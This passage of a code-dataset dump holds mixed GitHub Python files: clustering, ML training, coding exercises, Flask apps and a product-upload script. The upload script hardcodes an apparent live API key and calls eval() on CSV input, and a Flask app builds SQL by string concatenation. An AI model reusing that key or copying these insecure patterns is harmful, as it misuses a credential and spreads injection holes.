Returns the set of the k mean points selected '''\n \n means=[] # list of means selected\n means.append(l[random.randint(0,len(l)-1)])\n for i in range(k-1):\n means.append(KPlusPlus_iterate(l,means))\n return means\n\ndef KMeans_iterate(l,m):\n ''' Iterates one step of the k-means algorithm, returning the new clusters '''\n \n k=len(m)\n clusters=[[] for i in range(k)]\n for p in l:\n dist=[d(p,mean) for mean in m ]\n i=dist.index(min(dist))\n clusters[i].append(p)\n return clusters\n\ndef centroid(cluster):\n return tuple([\n sum([p[i] for p in cluster])/len(cluster) \n for i in range(len(cluster[0]))\n ])\n \ndef KMeans(l,m):\n ''' Implements the k-means algorithm with the means m on the list l '''\n \n m_old=[]\n m_new=m\n while m_new!=m_old:\n m_old=m_new\n clusters=KMeans_iterate(l,m_old)\n m_new=[centroid(c) for c in clusters]\n return clusters,m_new\n \n\ndef randpoint(x=1,y=1):\n ''' Returns a random point with cohordinates in \n [0,x),[0,y) '''\n try:\n return (random.random()*x,random.random()*y)\n except ValueError:\n print(\"Insert complex,real or integer number as cohordinates \")\n\n\n# now try the algorithm with random points\nx,y=1,1\npoints=[]\nfor i in range(1000):\n points.append(randpoint(x,y))\n \nx_cohord=[p[0] for p in points]\ny_cohord=[p[1] for p in points]\nplt.plot(x_cohord,y_cohord,'ro')\nplt.title('Random points in [0,%d)x[0,%d)'%(x,y))\nplt.show()\n\nk=5\nm=KPlusPlus(points,k)\nclusters, means=KMeans(points,m)\nfor i in range(k):\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,'.',mean[0],mean[1],'bo')\nplt.show()\nfor i in range(k): # plots with connected lines, to visualize differently\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,mean[0],mean[1],'bo')\nplt.show()\n \n\n \n \n \n \n \n \n \n \n \n","repo_name":"nickruggeri/Miscellanea","sub_path":"Algorithms/k_plus_plus.py","file_name":"k_plus_plus.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71829618012","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nmnist = input_data.read_data_sets(\"/home/hadoop/code/tensorflow_tutorials/python/MNIST_data/\")\nX_train = mnist.train.images\nX_test = mnist.test.images\ny_train = mnist.train.labels.astype(\"int\")\ny_test = mnist.test.labels.astype(\"int\")\n\nfeatures = tf.contrib.learn.infer_real_valued_columns_from_input(X_train)\nDNN_classifier = tf.contrib.learn.DNNClassifier(hidden_units=[300,100], n_classes=10, feature_columns=features)\nDNN_classifier.fit(x=X_train, y=y_train, batch_size=50, steps=1000)\n\nfrom sklearn.metrics import accuracy_score\ny_predict = list(DNN_classifier.predict(X_test))\naccuracy = accuracy_score(y_test, y_predict)\nprint(\"-------------------- Accuracy: \", accuracy)\n\nfrom sklearn.metrics import log_loss\ny_pred_proba = list(DNN_classifier.predict_proba(X_test))\nprint(\"----------------------- Log loss: \", log_loss(y_test, y_pred_proba))\n","repo_name":"Emilio66/machine_learning","sub_path":"02_DNN_High_Level.py","file_name":"02_DNN_High_Level.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16362466289","text":"\ndef solution(n, arr1, arr2):\n answer = []\n \n def zinsu(num):\n zin = ''\n for _ in range(n):\n zin += str(num%2)\n num = num//2\n return zin[::-1]\n \n arr1_list = 
list(map(zinsu, arr1))\n arr2_list = list(map(zinsu, arr2))\n \n for a1, a2 in zip(arr1_list, arr2_list):\n result = ''\n for i,j in zip(a1, a2):\n if i== \"0\" and j == \"0\":\n result += \" \"\n else:\n result += \"#\"\n \n answer.append(result)\n \n return answer","repo_name":"heweun/Algorithm_practice","sub_path":"프로그래머스/lv1/17681. [1차] 비밀지도/[1차] 비밀지도.py","file_name":"[1차] 비밀지도.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28884548102","text":"import csv\r\nimport json\r\nimport os\r\nimport requests\r\nfrom datetime import datetime\r\n\r\ndef send_product_to_api(products):\r\n # API configuration\r\n BASE_URL = \"https://api.instabuy.com.br/store/\"\r\n ENDPOINT = \"products\"\r\n API_KEY = \"Mq1EWAXiHwraLIQgfq4stmUxKiM6VpC5Xd9o3wuX1Go\"\r\n\r\n headers = {\r\n \"api-key\": f\"Bearer {API_KEY}\",\r\n \"Content-Type\": \"application/json\"\r\n }\r\n \r\n response = requests.put(f\"{BASE_URL}{ENDPOINT}\", headers=headers, params = products)\r\n return response\r\n\r\ndef file_in_same_directory(file_name):\r\n script_dir = os.path.dirname(os.path.abspath(__file__))\r\n file_path = os.path.join(script_dir, file_name)\r\n return file_path\r\n\r\ndef datetime_to_iso(date_str):\r\n if(len(date_str) == 46 and date_str[37]=='T'):\r\n start_date, end_date = date_str.split('/')\r\n return datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S.%f')\r\n if(date_str == \"\"):\r\n return \"\"\r\n months = {\r\n \"JAN\": 1, \"FEV\": 2, \"MAR\": 3, \"ABR\": 4, \"MAI\": 5, \"JUN\": 6,\r\n \"JUL\": 7, \"AGO\": 8, \"SET\": 9, \"OUT\": 10, \"NOV\": 11, \"DEZ\": 12\r\n }\r\n day, abb_month, year = date_str.split('-')\r\n day = int(day)\r\n month = months[abb_month]\r\n if(day>31 or month>12):\r\n return \"\"\r\n if(day>29 and month==2):\r\n return \"\"\r\n year = int(year) + 2000\r\n hour, minute, second = 0, 0, 0\r\n f = 672000\r\n date_iso = str(year)+'-'+str(month)+'-'+str(day)+'T'+str(hour)+':'+str(minute)+':'+str(second)+'.'+str(f)\r\n return datetime.strptime(date_iso, '%Y-%m-%dT%H:%M:%S.%f')\r\n\r\ndef csv_to_json():\r\n #Read CSV and add data to a dictionary\r\n with open(file_in_same_directory('items.csv'), encoding=\"utf8\") as csvFile:\r\n csvReader = csv.reader(csvFile, delimiter=';')\r\n data_list = list()\r\n for csvRow in csvReader:\r\n data_list.append(csvRow)\r\n\r\n data_list.pop(0)\r\n #Converting string to other types in list\r\n for properties in data_list:\r\n properties[3] = properties[3].replace(',', '.')\r\n properties[3] = float(properties[3])\r\n properties[4] = properties[4].replace(',', '.')\r\n if(properties[4] != ''):\r\n properties[4] = float(properties[4])\r\n properties[5] = datetime_to_iso(properties[5])\r\n properties[6] = properties[6].replace(',', '.')\r\n properties[6] = float(properties[6])\r\n properties[7] = eval(properties[7])\r\n\r\n data_list.insert(0, ['internal_code', 'barcodes', 'name', 'price', 'promo_price', 'promo_end_at', 'stock', 'visible'])\r\n #data = [dict(zip(data_list[0], csvRow)) for csvRow in data_list]\r\n data = []\r\n for csvRow in data_list:\r\n item_dict = {\r\n 'internal_code': csvRow[0],\r\n 'barcodes': csvRow[1],\r\n 'name': csvRow[2],\r\n 'price': csvRow[3],\r\n 'promo_price': csvRow[4],\r\n 'promo_end_at': csvRow[5],\r\n 'stock': csvRow[6],\r\n 'visible': csvRow[7],\r\n 'promo_start_at': csvRow[5],\r\n 'unit_type': 'UNI'\r\n }\r\n data.append(item_dict)\r\n\r\n data.pop(0)\r\n\r\n #Write data to a Json file\r\n with 
open(file_in_same_directory('items.json'), \"w\") as jsonFile:\r\n jsonFile.write(json.dumps(data, indent=4, sort_keys=True, default=str))\r\n\r\ndef main():\r\n try:\r\n json_file = csv_to_json()\r\n response = send_product_to_api(json_file)\r\n print(f\"Reason: {response.reason}\\nStatus Code: {response.status_code}\")\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"victorhugomr/integration-aug-23","sub_path":"integration-aug-23.py","file_name":"integration-aug-23.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"46162133052","text":"import tkinter as tk\nfrom model.observation.observationCode import ObservationCode\nfrom view.moreInfo import MoreInfo\nimport dateutil.parser\n\n\nclass PatientInfo(tk.Frame):\n\n def __init__(self, master, controller, patient, *args, **kwargs):\n \"\"\"\n Display oh patient name and cholesterol info\n :param master: master window\n :param controller: controller to request data from model\n :param patient: patient to get info from\n \"\"\"\n super(PatientInfo, self).__init__(master, *args, **kwargs)\n self.configure(width=950, height=30)\n\n # initialising variables\n self.id = patient.get_identifier()\n self.controller = controller\n self.patient = patient\n\n self.controller.update_patient_obs(ObservationCode.CHOLESTEROL, patient)\n self.controller.update_patient_obs(ObservationCode.BLOOD_PRESSURE, patient)\n self.controller.update_patient_obs(ObservationCode.TOBACCO_SMOKING_STATUS_NHIS, patient)\n\n # creating and placing display\n self.name_label = tk.Label(self, text=patient.get_display_name(), relief=\"groove\")\n self.name_label.place(x=0, y=0, width=200, height=30)\n\n cholesterol = patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value = tk.Label(self, text=str(cholesterol.get_value()),\n relief=\"groove\")\n self.date_value = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.chol_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value = tk.Label(self, text=\"N/A\", relief=\"groove\")\n\n blood_test = patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood_test is not None:\n date = dateutil.parser.parse(str(blood_test.get_date()))\n self.sys_value = tk.Label(self, text=str(blood_test.get_value()['Systolic_value']), relief=\"groove\")\n self.dia_value = tk.Label(self, text=str(blood_test.get_value()['Diastolic_value']), relief=\"groove\")\n self.date_value2 = tk.Label(self, text=str(date.date()) + \" \" + str(date.hour) + \":\" + str(\n date.minute) + \":\" + str(date.second), relief=\"groove\")\n else:\n self.sys_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.dia_value = tk.Label(self,\n text=\"N/A\",\n relief=\"groove\")\n self.date_value2 = tk.Label(self, text=\"N/A\", relief=\"groove\")\n self.chol_value.place(x=200, y=0, width=175, height=30)\n self.date_value.place(x=375, y=0, width=125, height=30)\n self.dia_value.place(x=500, y=0, width=100, height=30)\n self.sys_value.place(x=600, y=0, width=100, height=30)\n self.date_value2.place(x=700, y=0, width=125, height=30)\n\n # Button to open more info window\n more_info = tk.Button(self, text=\"More Patient Info\", 
relief=\"groove\", bg=\"lime\", command=self.__more_info_window)\n more_info.place(x=825, y=0, width=100, height=30)\n\n def update_obs(self):\n \"\"\"\n updates cholesterol value to most recent\n :return: None\n \"\"\"\n cholesterol = self.patient.get_latest_observation_entry(ObservationCode.CHOLESTEROL)\n if cholesterol is not None:\n date = dateutil.parser.parse(str(cholesterol.get_date()))\n self.chol_value['text'] = str(cholesterol.get_value())\n self.date_value['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n blood = self.patient.get_latest_observation_entry(ObservationCode.BLOOD_PRESSURE)\n if blood is not None:\n date = dateutil.parser.parse(str(blood.get_date()))\n self.sys_value['text'] = str(blood.get_value()['Systolic_value'])\n self.dia_value['text'] = str(blood.get_value()['Diastolic_value'])\n self.date_value2['text'] = str(date.date()) + \" \" + str(date.hour) + \":\" + str(date.minute) + \":\" + str(date.second)\n\n def highlight_text(self):\n \"\"\"\n Highlight cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'red'\n self.name_label['fg'] = 'red'\n\n def highlight_dia(self):\n self.dia_value['fg'] = 'purple'\n\n def default_dia(self):\n self.dia_value['fg'] = 'black'\n\n def highlight_sys(self):\n self.sys_value['fg'] = 'purple'\n\n def default_sys(self):\n self.sys_value['fg'] = 'black'\n\n def default_text(self):\n \"\"\"\n Remove highlight from cholesterol and name\n :return: None\n \"\"\"\n self.chol_value['fg'] = 'black'\n self.name_label['fg'] = 'black'\n\n def __more_info_window(self):\n \"\"\"\n Open more info for patient\n :return: None\n \"\"\"\n self.wait_window(MoreInfo(self, self.patient, self.controller))\n","repo_name":"mt-empty/FHIR_application","sub_path":"src/view/patientInfo.py","file_name":"patientInfo.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20673783185","text":"import torch\nfrom tensordict.nn import InteractionType, TensorDictModule\nfrom tensordict.nn.distributions import NormalParamExtractor\nfrom torch import nn, optim\nfrom torchrl.collectors import SyncDataCollector\nfrom torchrl.data import TensorDictPrioritizedReplayBuffer, TensorDictReplayBuffer\nfrom torchrl.data.replay_buffers.storages import LazyMemmapStorage\nfrom torchrl.envs import Compose, DoubleToFloat, EnvCreator, ParallelEnv, TransformedEnv\nfrom torchrl.envs.libs.gym import GymEnv\nfrom torchrl.envs.transforms import RewardScaling\nfrom torchrl.envs.utils import ExplorationType, set_exploration_type\nfrom torchrl.modules import MLP, ProbabilisticActor, ValueOperator\nfrom torchrl.modules.distributions import TanhNormal\nfrom torchrl.objectives import SoftUpdate\nfrom torchrl.objectives.sac import SACLoss\n\n\n# ====================================================================\n# Environment utils\n# -----------------\n\n\ndef env_maker(task, frame_skip=1, device=\"cpu\", from_pixels=False):\n return GymEnv(task, device=device, frame_skip=frame_skip, from_pixels=from_pixels)\n\n\ndef apply_env_transforms(env, reward_scaling=1.0):\n transformed_env = TransformedEnv(\n env,\n Compose(\n RewardScaling(loc=0.0, scale=reward_scaling),\n DoubleToFloat(in_keys=[\"observation\"], in_keys_inv=[]),\n ),\n )\n return transformed_env\n\n\ndef make_environment(cfg):\n \"\"\"Make environments for training and evaluation.\"\"\"\n parallel_env = ParallelEnv(\n cfg.collector.env_per_collector,\n 
EnvCreator(lambda: env_maker(task=cfg.env.name)),\n )\n parallel_env.set_seed(cfg.env.seed)\n\n train_env = apply_env_transforms(parallel_env)\n\n eval_env = TransformedEnv(\n ParallelEnv(\n cfg.collector.env_per_collector,\n EnvCreator(lambda: env_maker(task=cfg.env.name)),\n ),\n train_env.transform.clone(),\n )\n return train_env, eval_env\n\n\n# ====================================================================\n# Collector and replay buffer\n# ---------------------------\n\n\ndef make_collector(cfg, train_env, actor_model_explore):\n \"\"\"Make collector.\"\"\"\n collector = SyncDataCollector(\n train_env,\n actor_model_explore,\n frames_per_batch=cfg.collector.frames_per_batch,\n max_frames_per_traj=cfg.collector.max_frames_per_traj,\n total_frames=cfg.collector.total_frames,\n device=cfg.collector.collector_device,\n )\n collector.set_seed(cfg.env.seed)\n return collector\n\n\ndef make_replay_buffer(\n batch_size,\n prb=False,\n buffer_size=1000000,\n buffer_scratch_dir=\"/tmp/\",\n device=\"cpu\",\n prefetch=3,\n):\n if prb:\n replay_buffer = TensorDictPrioritizedReplayBuffer(\n alpha=0.7,\n beta=0.5,\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n else:\n replay_buffer = TensorDictReplayBuffer(\n pin_memory=False,\n prefetch=prefetch,\n storage=LazyMemmapStorage(\n buffer_size,\n scratch_dir=buffer_scratch_dir,\n device=device,\n ),\n batch_size=batch_size,\n )\n return replay_buffer\n\n\n# ====================================================================\n# Model\n# -----\n\n\ndef get_activation(cfg):\n if cfg.network.activation == \"relu\":\n return nn.ReLU\n elif cfg.network.activation == \"tanh\":\n return nn.Tanh\n elif cfg.network.activation == \"leaky_relu\":\n return nn.LeakyReLU\n else:\n raise NotImplementedError\n\n\ndef make_sac_agent(cfg, train_env, eval_env, device):\n \"\"\"Make SAC agent.\"\"\"\n # Define Actor Network\n in_keys = [\"observation\"]\n action_spec = train_env.action_spec\n if train_env.batch_size:\n action_spec = action_spec[(0,) * len(train_env.batch_size)]\n actor_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 2 * action_spec.shape[-1],\n \"activation_class\": get_activation(cfg),\n }\n\n actor_net = MLP(**actor_net_kwargs)\n\n dist_class = TanhNormal\n dist_kwargs = {\n \"min\": action_spec.space.minimum,\n \"max\": action_spec.space.maximum,\n \"tanh_loc\": False,\n }\n\n actor_extractor = NormalParamExtractor(\n scale_mapping=f\"biased_softplus_{cfg.network.default_policy_scale}\",\n scale_lb=cfg.network.scale_lb,\n )\n actor_net = nn.Sequential(actor_net, actor_extractor)\n\n in_keys_actor = in_keys\n actor_module = TensorDictModule(\n actor_net,\n in_keys=in_keys_actor,\n out_keys=[\n \"loc\",\n \"scale\",\n ],\n )\n actor = ProbabilisticActor(\n spec=action_spec,\n in_keys=[\"loc\", \"scale\"],\n module=actor_module,\n distribution_class=dist_class,\n distribution_kwargs=dist_kwargs,\n default_interaction_type=InteractionType.RANDOM,\n return_log_prob=False,\n )\n\n # Define Critic Network\n qvalue_net_kwargs = {\n \"num_cells\": cfg.network.hidden_sizes,\n \"out_features\": 1,\n \"activation_class\": get_activation(cfg),\n }\n\n qvalue_net = MLP(\n **qvalue_net_kwargs,\n )\n\n qvalue = ValueOperator(\n in_keys=[\"action\"] + in_keys,\n module=qvalue_net,\n )\n\n model = nn.ModuleList([actor, qvalue]).to(device)\n\n # init nets\n with torch.no_grad(), 
set_exploration_type(ExplorationType.RANDOM):\n td = eval_env.reset()\n td = td.to(device)\n for net in model:\n net(td)\n del td\n eval_env.close()\n\n return model, model[0]\n\n\n# ====================================================================\n# SAC Loss\n# ---------\n\n\ndef make_loss_module(cfg, model):\n \"\"\"Make loss module and target network updater.\"\"\"\n # Create SAC loss\n loss_module = SACLoss(\n actor_network=model[0],\n qvalue_network=model[1],\n num_qvalue_nets=2,\n loss_function=cfg.optimization.loss_function,\n delay_actor=False,\n delay_qvalue=True,\n )\n loss_module.make_value_estimator(gamma=cfg.optimization.gamma)\n\n # Define Target Network Updater\n target_net_updater = SoftUpdate(\n loss_module, eps=cfg.optimization.target_update_polyak\n )\n return loss_module, target_net_updater\n\n\ndef make_sac_optimizer(cfg, loss_module):\n \"\"\"Make SAC optimizer.\"\"\"\n optimizer = optim.Adam(\n loss_module.parameters(),\n lr=cfg.optimization.lr,\n weight_decay=cfg.optimization.weight_decay,\n )\n return optimizer\n","repo_name":"feifeifei416/rl","sub_path":"examples/sac/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"41740149736","text":"import sys\nfrom collections import deque\n\nn,m=map(int,sys.stdin.readline().split(\" \"))\n\narr=[list(map(int,sys.stdin.readline().strip())) for _ in range(n)]\n\nfixed_arr=[]\n\nmove=[[1,-1,0,0],[0,0,1,-1]]\n\nchecked=[[0]*m for _ in range(n)]\n\nque=deque()\n\ncount=0\n\nstack=[] ## 배열들 보관했다가 값 바꿔줌\n\nindex=0\n\nfor i in range(n): ## 먼저 한번 돌리면서 각각 연결되어있는 0들이 몇개씩 연결되있는지 센다음 표시해주고 나중에 구분을 위해 index도 부여해서 리스트로 [겂,인덱스]이렇게 만든다\n for j in range(m):\n if(arr[i][j]==1):\n arr[i][j]=-1\n if(arr[i][j]==0 and checked[i][j]==0):\n count+=1\n checked[i][j]=1\n stack.append([i,j])\n que.append([i,j])\n while(que):\n item=que.popleft()\n for k in range(4):\n x=item[0]+move[0][k]\n y=item[1]+move[1][k]\n if(0<=x\")\ndef show_lottery_details(id):\n lottery = requests.get(f\"http://localhost:5000/lottery/{id}\").json()\n\n txs = lottery['users'] \n \n buffer = BytesIO()\n \n qr_data = f\"tron:{lottery['address']}?token=TRX&amount={lottery['prize']}¬e={lottery['id']}\"\n qr = qrcode.QRCode(version=1, box_size=4, border=1)\n qr.add_data(qr_data)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"#F0B90B\", back_color=\"#2c2c2c\")\n img.save(buffer, format=\"PNG\")\n qr_png = buffer.getvalue()\n qr_base64 = base64.b64encode(qr_png).decode()\n\n return render_template(\"lotto.html\", lottery=lottery, txs=txs, qr=qr_base64)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=4999)","repo_name":"dreistein33/jackpotron","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38194565564","text":"import sys\nimport os\n\nmodels_path = \"models\"\n# this will break any attempt to import xformers which will prevent stability diffusion repo from trying to use it\nif \"--xformers\" not in \"\".join(sys.argv):\n sys.modules[\"xformers\"] = None\n\nif \"--no-half-vae\" not in \"\".join(sys.argv):\n 
sys.argv.append('--no-half-vae')\nsys.argv.append(f'--clip-models-path={models_path}/CLIP')\n","repo_name":"ChengLong1222/stable-diffusion-webui","sub_path":"modules/import_hook.py","file_name":"import_hook.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"23744291654","text":"#Christan Park\n#worksheet on strings \nimport os\nos.system(\"cls\")\n\n#Question 1: get first middle and last letters\n\n#method 1\na = \"James\"\nprint(len(a)) #number of letter in word\nprint(a[0], end='') #get first letter\nprint(a[2], end='') #put middle letter on same line\nprint(a[4]) #put last letter on same line\n\n#method 2\nword = input('Your word is ') #get word from user\nnumber = (len(word)) #get the number of letters in the word\nfirst = word[0] #get first letter of word\nmiddleNumber = int(number/2) #get the number of the middle digit in word\nmiddle = word[middleNumber] #get the middle letter\nlast = word[number-1] #get last letter\nprint(first+middle+last) #print first middle and last letter together \n\n\n#Question 2: Create a string made of the middle three characters\n\nword = input('Your word is ') #get word from user\nnumber = len(word) #get number of letters in the word\nmiddle2=number//2 #double division -> integer division\nmiddleFirst = word[middle2-1:middle2+2]\nprint(middleFirst)\n#print(\"The middle three characters are:\",word[middle2-1]+word[middle2]+word[middle2+1])\n\n\n#Question 3: Append New string in the middle of a given string\n\nword = input('Your word is ') #get word from user\nword2 = input('Your second word is ') #get seocnd word \nmiddleNumber2 = (len(word)//2) #get which number letter is the middle\nhalf1=len(word)//2 #make half1 = middle letter number \nprint(word[0:half1]+word2+word[half1:len(word)]) #print first word of word1 to half then insert word2 and rest of word with back half of word1\n\n\n#Question 4: Create a new string made of the first, middle, and last characters of each input string\n\nword3 = input('Your word is ') #get word from user\nword4 = input('Your second word is ') #get second word\nfirst1=word3[0] #get first letter of first word\nfirst2=word4[0] #get first letter of second word \nmiddle3=word3[len(word3)//2] #get middle letter of first word\nmiddle4=word4[len(word4)//2] #get middle letter of seocnd word\nlast2=word3[len(word3)-1] #get last letter of first word\nlast3=word4[len(word4)-1] #get last letter of second word\nprint(first1+first2+middle3+middle4+last2+last3) #add all letters together \n\n\n#Question 5:Arrange string characters such that lowercase letters should come first\n\nword5 = input('Your word is ')\nlower = []\nupper = []\nfor characters in word5:\n if characters.islower(): #islower -> returns True if all characters in the string are lower case\n lower.append(characters) #append moves characters to end of list\n else:\n upper.append(characters) #append moves characters to end of list\n\nprint(lower)\nprint(upper)\nsortedWord = ''.join(lower + upper) # join() takes all items and joines them into one string\nprint('Sorted word is ', sortedWord)\n\n#!!!!! Why need ''. before join???? 
-> https://stackoverflow.com/questions/14868763/global-name-join-is-not-defined-django\n\n\n","repo_name":"parkc25/MorningGameDesign","sub_path":"Introduction/StringsAssignment.py","file_name":"StringsAssignment.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1083096913","text":"file = open(\"aoc21_input.txt\")\nl = file.read().split(\"\\n\")\nfile.close()\n\nd = {}\n\nall_food = set()\namount = {}\n\nfor i in l:\n s = i.split(\" (contains \")\n food = set(s[0].split())\n allergens = s[1][:-1].split(\", \")\n\n all_food |= food\n\n for j in food:\n if j in amount:\n amount.update({j: amount[j]+1})\n else:\n amount.setdefault(j, 1)\n\n for j in allergens:\n if j in d.keys():\n n = d[j] & food\n d.update({j: n})\n else:\n d.setdefault(j, food)\n\nprint(d)\n\nwhile True:\n for i in d.keys():\n if len(d[i]) == 1:\n this_food = list(d[i])[0]\n for j in d.keys():\n if i == j:\n continue\n if this_food in d[j]:\n s = d[j]\n s.remove(this_food)\n d.update({j: s})\n \n looping = False\n for i in d.keys():\n if len(d[i]) > 1:\n looping = True\n if not looping:\n break\n\nprint(d)\n\nrl = []\nfor i in sorted(d.keys()):\n rl.append(list(d[i])[0])\n\nprint(\",\".join(rl))","repo_name":"TimHuisman1703/AdventOfCode","sub_path":"2020/Day 21/aoc21_2.py","file_name":"aoc21_2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30119032137","text":"\"\"\"\r\n\n\nGiven a list, create a function that returns a dictionary detailing how many\ntimes each element was repeated.\n\n### Examples\n\n count_repetitions([\"cat\", \"dog\", \"cat\", \"cow\", \"cow\", \"cow\"]) ➞ { cow: 3, cat: 2, dog: 1 }\n \n count_repetitions([1, 5, 5, 5, 12, 12, 0, 0, 0, 0, 0, 0]) ➞ { 0: 6, 5: 3, 12: 2, 1: 1 }\n \n count_repetitions([\"Infinity\", \"null\", \"Infinity\", \"null\", \"null\"]) ➞ { \"null\": 3, \"Infinity\": 2}\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef count_repetitions(lst):\n dic1 = {}\n for i in lst:\n if i not in dic1:\n dic1[i] = 1\n else:\n x = dic1[i]\n x += 1\n dic1[i] = x\n return dic1\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"gDtHS9cAy8Fs2X7pH_23.py","file_name":"gDtHS9cAy8Fs2X7pH_23.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2472358080","text":"st = input()\nl = len(st)\nfirstLt = int(st[0])\np = []\nfor i in range(1, l):\n p.append(i)\nlp = len(p)\nif firstLt == lp:\n print(\"TRUE {}\".format(lp))\nelse:\n print(\"FALSE {}\".format(lp))\n\n\"\"\"\ninp: 5hello\nolp: TRUE 5\n\"\"\"\n","repo_name":"rajeswari98/Python-Codes","sub_path":"LetUsCrackCodes/digitalTCS1.py","file_name":"digitalTCS1.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4187488630","text":"from requests_queue.handlers.base import BaseHandler\nfrom requests_queue.serializers.request import RequestSerializer\nfrom requests_queue.domain.requests import Requests\nfrom .utils import parse_body\n\n\nclass RequestsIndexHandler(BaseHandler):\n def initialize(self, db_session):\n self.db_session = db_session\n self.requests_repo = Requests(self.db_session)\n\n def post(self):\n json = parse_body(self.request)\n request = self.requests_repo.create(json[\"creator_id\"], json[\"request\"])\n self.set_status(202)\n 
self.write(RequestSerializer().dump(request).data)\n\n def get(self, **kwargs):\n creator_id = self.get_argument('creator_id', None)\n requests = self.requests_repo.get_many(creator_id=creator_id)\n serialized_requests = RequestSerializer().dump(requests, many=True).data\n self.write({'requests': serialized_requests})\n","repo_name":"dod-ccpo/requests-queue","sub_path":"requests_queue/handlers/requests_index.py","file_name":"requests_index.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70927137050","text":"'''\r\n\r\nAuthor: Delzad Bamji\r\n'''\r\n\r\nfrom flask import Flask, render_template, request, redirect, g\r\n\r\nimport shelve\r\nfrom flask_restful import Resource, Api, reqparse\r\nimport sqlite3\r\nimport requests\r\nimport pandas as pd\r\nimport json\r\nimport configparser\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n# def get_db():\r\n# db = getattr(g, '_database', None)\r\n# if db is None:\r\n#\r\n# db = g._database = sqlite3.connect(\"HORSEDATA.db\")\r\n# cur = db.cursor()\r\n# cur.execute(\r\n# \"\"\"create table if not exists {} (\r\n# id integer PRIMARY KEY NOT NULL,\r\n# name text,\r\n# price integer,\r\n# age integer,\r\n# height float,\r\n# sex text)\"\"\".format(\"Horse\")\r\n# )\r\n#\r\n# with open(\"HorsePrices.csv\", \"r\") as f:\r\n# content = f.read().split(\"\\n\")\r\n# i = len(content)\r\n# for line in content:\r\n# if i == 1:\r\n# break\r\n# # print(line)\r\n# line = line.split(\",\")\r\n# sql = \"insert into Horse(id,name,price,age,height,sex) values(\" + line[1] + \",\" + \"'\" + line[\r\n# 2] + \"'\" + \",\" + line[3] + \",\" + line[4] + \",\" + line[5] + \",\" + \"'\" + line[6] + \"'\" + \")\"\r\n# cur.execute(sql)\r\n# i -= 1\r\n#\r\n# return db\r\n\r\n#\r\n# @app.teardown_appcontext\r\n# def teardown_db(exception):\r\n# db = getattr(g, '_database', None)\r\n# if db is not None:\r\n# db.close()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('configheader.properties')\r\nconfig[\"configheader\"][\"flag\"] = \"False\"\r\nwith open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n horse_data = \"\"\r\n warning = \"\"\r\n sqlstring = \"\"\r\n endpoint_info={}\r\n querying=\"\"\r\n # if post method is called after form submission\r\n if request.method == \"POST\":\r\n print(\"FORM DATA RECEIVED IN POST METHOD\")\r\n\r\n\r\n# /////////////////////////\r\n\r\n if \"nm\" in request.form:\r\n print(request.form[\"nm\"])\r\n horseName = request.form[\"nm\"]\r\n getSql = 